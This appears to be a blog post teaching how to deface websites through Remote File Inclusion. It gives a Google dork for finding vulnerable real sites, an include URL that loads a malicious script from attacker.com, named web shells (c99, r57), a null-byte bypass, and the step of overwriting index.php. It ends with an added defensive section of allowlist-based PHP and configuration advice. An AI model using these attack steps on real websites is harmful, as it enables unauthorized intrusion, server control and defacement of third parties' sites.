Thursday, 18 January 2024

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows an attacker to get malicious code or a malicious file loaded by a website or server. The vulnerability arises from insufficient validation checks on user input in a website and can lead to code execution on the server or on the website. This time, I will be writing a simple tutorial on Remote File Inclusion, and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. Website hacking is not all about SQL injection. Using RFI, an attacker can literally deface websites, get access to the server and do almost anything with it. What makes it a red alert for websites is that only common sense and a basic knowledge of PHP are needed to execute malicious code. Bash might come in handy, as most servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find an RFI-vulnerable website. Let's see how we can find one.
As we know, finding a vulnerability is the first step in hacking a website or server. So, let's get started: simply go to Google and search for the following query.
inurl: "index.php?page=home"
In place of home, you can also try other pages such as products, gallery, etc.
If you already know an RFI-vulnerable website, then you don't need to find it through Google.
Once we have found one, let's move on to the next step. Let's say we have the following RFI-vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use the PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have put the URL of my malicious code .txt file in place of home. You can use any shell as the malicious script, such as c99, r57 or any other.
Now, if it's a really vulnerable website, then one of 3 things can happen.
  1. You might have noticed that the URL containing "page=home" had no extension, but I have included an extension in my URL. Hence the site may give an error like 'failure to include maliciousScript.txt'. This might happen because the site automatically appends the .txt extension to the pages stored on the server.
  2. If it automatically appends something along the lines of .php, then we have to use a null byte '' in order to avoid the error.
  3. Successful execution.
Once we get successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php and replace the file with our deface page.
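
On the defending side, everything described above depends on index.php passing the `page` parameter straight into `include`. The following is an added example, not code from the original post: it shows that vulnerable pattern as a comment next to a hardened replacement that maps the parameter through an allowlist. The names `PAGE_DIR`, `PAGES` and `resolve_page()` and the `pages/` directory layout are assumptions made for illustration.

```php
<?php
// Added example; PAGE_DIR, PAGES and resolve_page() are hypothetical names.

// Vulnerable pattern the article relies on: request data flows straight into
// include, so a URL in ?page= is fetched and executed when the php.ini
// setting allow_url_include is On.
//   include $_GET['page'] . '.txt';

const PAGE_DIR = __DIR__ . '/pages';   // assumed location of the page files
const PAGES = [                        // allowlist: request key => file on disk
    'home'     => 'home.txt',
    'products' => 'products.txt',
    'gallery'  => 'gallery.txt',
];

/** Map a requested page key to a file under PAGE_DIR, or null if not allowed. */
function resolve_page(string $requested): ?string
{
    // Only exact allowlist keys are accepted. URLs, "../" sequences and
    // NUL bytes never match a key, so they are rejected without parsing.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the resolved file must still sit inside PAGE_DIR
    // (guards against a symlink or a bad allowlist entry).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
// ?page[]=x arrives as an array; treat anything that is not a string as invalid.
$file = is_string($page) ? resolve_page($page) : null;
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}

// Content pages are data, not code: readfile() sends the bytes to the client
// without executing them, unlike include.
header('Content-Type: text/html; charset=utf-8');
readfile($file);
```

Independently of the code, `allow_url_include` has defaulted to Off since PHP 5.2.0 and should stay Off, which blocks the remote-URL case at the interpreter level. PHP 5.3.4 and later also reject paths containing NUL bytes, so the null-byte trick in item 2 applies only to older versions.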
